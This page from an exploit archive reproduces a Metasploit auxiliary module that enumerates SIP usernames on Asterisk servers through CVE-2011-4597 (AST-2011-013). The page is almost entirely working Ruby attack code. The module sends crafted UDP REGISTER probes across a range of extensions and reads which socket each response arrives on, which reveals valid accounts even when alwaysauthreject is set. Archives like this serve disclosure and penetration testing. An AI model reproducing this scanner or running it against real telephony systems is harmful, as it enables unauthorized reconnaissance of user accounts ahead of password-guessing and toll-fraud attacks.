SIP Username Enumerator For Asterisk

2011.12.24
Credit: metasploit
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SIP Username Enumerator for Asterisk (UDP) Security Advisory AST-2011-013, CVE-2011-4597', 'Version' => '$Revision: 1 $', 'Description' => 'REGISTER scan for numeric peer usernames having a nat setting different to global sip nat setting. ' << 'Works even when alwaysauthreject=yes. For this exploit to work, the source port cannot be 5060. ' << 'For more details see Asterisk Project Security Advisory - AST-2011-013', 'Author' => 'Ben Williams', 'License' => MSF_LICENSE ) register_options( [ OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]), OptInt.new('MINEXT', [true, 'Starting extension',0]), OptInt.new('MAXEXT', [true, 'Ending extension', 9999]), OptInt.new('PADLEN', [true, 'Cero padding maximum length', 4]), Opt::RPORT(5060), Opt::CHOST, Opt::CPORT(5070) # Source port must *not* be 5060 for this exploit to work. ], self.class) end # Define our batch size def run_batch_size datastore['BATCHSIZE'].to_i end # Operate on an entire batch of hosts at once def run_batch(batch) begin udp_sock = udp_sock_5060 = recv_sock = nil idx = 0 global_nat = '' # SIP responses are either sent back to our source port or to 5060 # so we need to have two sockets. # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) udp_sock = Rex::Socket::Udp.create( { 'LocalHost' => datastore['CHOST'] || nil, 'LocalPort' => datastore['CPORT'].to_i, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } } ) add_socket(udp_sock) udp_sock_5060 = Rex::Socket::Udp.create( { 'LocalHost' => datastore['CHOST'] || nil, 'LocalPort' => 5060, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } } ) add_socket(udp_sock_5060) mini = datastore['MINEXT'] maxi = datastore['MAXEXT'] batch.each do |ip| # First create a probe for a nonexistent user to test what the global nat setting is. # If the response arrives back on the same socket, then global nat=yes, # and the scanner will proceed to find devices that have nat=no. # If the response arrives back on 5060, then global nat=no (default), # and the scanner will proceed to find devices that have nat=yes. data = create_probe(ip,"thisusercantexist") begin udp_sock.sendto(data, ip, datastore['RPORT'].to_i, 0) rescue ::Interrupt raise $! rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused nil end r = udp_sock.recvfrom(65535, 1) # returns [data,host,port] if r[1] global_nat = "yes" else r = udp_sock_5060.recvfrom(65535, 1) if r[1] global_nat = "no" end end if global_nat == '' print_error("No response from server for initial test probe.") return else print_status("Asterisk appears to have global nat=#{global_nat}.") end recv_sock = (global_nat == "no") ? udp_sock : udp_sock_5060 for i in (mini..maxi) testext = padnum(i,datastore['PADLEN']) data = create_probe(ip,testext) begin udp_sock.sendto(data, ip, datastore['RPORT'].to_i, 0) rescue ::Interrupt raise $! rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused nil end if (idx % 10 == 0) while (r = recv_sock.recvfrom(65535, 0.02) and r[1]) parse_reply(r) end end idx += 1 end end while (r = recv_sock.recvfrom(65535, 3) and r[1]) parse_reply(r) end rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure udp_sock.close if udp_sock udp_sock_5060.close if udp_sock_5060 end end # # The response parsers # def parse_reply(pkt) return if not pkt[1] if(pkt[1] =~ /^::ffff:/) pkt[1] = pkt[1].sub(/^::ffff:/, '') end resp = pkt[0].split(/\s+/)[1] return if resp == '100' # ignore provisional responses, we will get a 401 next packet. rhost,rport = pkt[1], pkt[2] if(pkt[0] =~ /^To\:\s*(.*)$/i) testn = "#{$1.strip}".split(';')[0] end print_status("Found user: #{testn} [Auth]") #Add Report report_note( :host => rhost, :proto => 'udp', :sname => 'sip', :port => rport, :type => "Found user: #{testn} [Auth]", :data => "Found user: #{testn} [Auth]" ) end def create_probe(ip,toext) suser = Rex::Text.rand_text_alphanumeric(rand(8)+1) shost = Rex::Socket.source_address(ip) data = "REGISTER sip:#{toext}@#{ip} SIP/2.0\r\n" data << "Via: SIP/2.0/UDP #{shost};branch=z9hG4bK.#{"%.8x" % rand(0x100000000)};rport;alias\r\n" data << "From: #{toext} <sip:#{suser}@#{shost}>;tag=70c00e8c\r\n" data << "To: #{toext} <sip:#{toext}@#{ip}>\r\n" data << "Call-ID: #{rand(0x100000000)}@#{shost}\r\n" data << "CSeq: 101 REGISTER\r\n" data << "Contact: <sip:#{suser}@#{shost}>\r\n" data << "Content-Length: 0\r\n" data << "Max-Forwards: 20\r\n" end def padnum(num,padding) if padding >= num.to_s.length ('0'*(padding-num.to_s.length)) << num.to_s end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top